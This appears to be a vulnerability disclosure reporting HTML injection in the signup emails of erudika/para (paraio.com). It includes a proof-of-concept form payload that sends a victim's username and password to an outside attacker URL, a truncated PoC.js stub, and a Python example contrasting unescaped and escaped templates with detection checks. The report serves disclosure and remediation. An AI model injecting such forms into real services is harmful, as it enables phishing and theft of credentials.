HTML injection leading to cross-site scripting in erudika/para
Reported on
May 14th 2022
Description
The name entered on the signup form is rendered unescaped into the email that the system sends to the signup address. An attacker who registers an account with the victim's email address and puts an HTML form in the name field therefore gets that form rendered by the system and delivered to the victim as part of the email.
Proof of Concept
- Go to https://paraio.com/signup/ and enter the following payload in the name field:
```html
<form action="https://brutelogic.com.br/poc.svg/" method="post"> <label for="username">Username:</label> <input class="userbox" type="text" name="username"/><br /> <label for="password">Password:</label> <input type="text" name="password" > <input class="button" type="submit" value="submit" /> </form>
```
- Enter the victim's email address and create the new account.
- Open the victim's mailbox and check the email: the payload has been rendered as HTML rather than shown as text.
- Submit the form to trigger the XSS.
```js
// PoC.js
var payload = ...
```
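The bug class behind the steps above is a display name interpolated into an HTML email body without escaping. The following is an added example, not code from the report or from erudika/para: a hypothetical welcome-mail template rendered both the vulnerable way and with HTML escaping, plus two checks a maintainer could run. The template string, the trusted host name `paraio.com` and the constructed sample input (the report's form, with its action URL) are assumptions made for the example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample input: the form from the report's PoC, pasted as the "name".
REPORT_PAYLOAD = (
    '<form action="https://brutelogic.com.br/poc.svg/" method="post">'
    '<label for="username">Username:</label>'
    '<input class="userbox" type="text" name="username"/><br />'
    '<label for="password">Password:</label>'
    '<input type="text" name="password">'
    '<input class="button" type="submit" value="submit" />'
    '</form>'
)

# Hypothetical HTML welcome-mail template (assumption: the mail body is text/html).
TEMPLATE = "<p>Hi {name}, welcome to the service!</p>"


def render_welcome_vulnerable(name: str) -> str:
    """Interpolates the user-controlled name straight into the HTML body.

    This is the pattern the report describes: any tags in the name are
    delivered to the recipient as live markup.
    """
    return TEMPLATE.format(name=name)


def render_welcome_escaped(name: str) -> str:
    """Same template, but the name is HTML-escaped first.

    html.escape turns < > & " ' into entities, so the mail client shows the
    payload as literal text instead of rendering a form.
    """
    return TEMPLATE.format(name=html.escape(name, quote=True))


# Input-side check: a display name should never contain a tag opener.
# Matches "<tag", "</tag" and "<!--" while leaving "a < b" style text alone.
TAG_OPENER_RE = re.compile(r"<\s*/?\s*[A-Za-z!]")


def contains_markup(value: str) -> bool:
    """True if the value contains something that would start an HTML tag."""
    return TAG_OPENER_RE.search(value) is not None


class FormActionCollector(HTMLParser):
    """Collects the action attribute of every <form> the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.actions: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def external_form_actions(body: str, trusted_host: str) -> list[str]:
    """Output-side check: forms in the rendered mail that post off-site.

    Relative actions (no host) are treated as first-party. Escaped payloads
    produce no <form> element at all, so they yield an empty list.
    """
    collector = FormActionCollector()
    collector.feed(body)
    return [
        action
        for action in collector.actions
        if urlparse(action).hostname not in (None, trusted_host)
    ]


if __name__ == "__main__":
    vulnerable = render_welcome_vulnerable(REPORT_PAYLOAD)
    safe = render_welcome_escaped(REPORT_PAYLOAD)
    print("name contains markup:", contains_markup(REPORT_PAYLOAD))
    print("off-site forms (vulnerable):", external_form_actions(vulnerable, "paraio.com"))
    print("off-site forms (escaped):", external_form_actions(safe, "paraio.com"))
```

The input-side check is the cheaper fix to deploy, but escaping at the point of rendering is the one that actually closes the bug: a name that passes validation today can still be stored by another code path or changed later, while a template that escapes every interpolated value is safe regardless of what is in the database. The parser-based check is useful as a regression test on generated mail, since it flags a rendered off-site form rather than relying on a regex over the whole body.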
Impact
Cross-site scripting can be used to steal users' cookies, which eventually leads to account takeover. In the PoC above, the injected form also posts whatever the victim types into its username and password fields to the attacker-controlled action URL.
Hi @admin, can you please assign a CVE?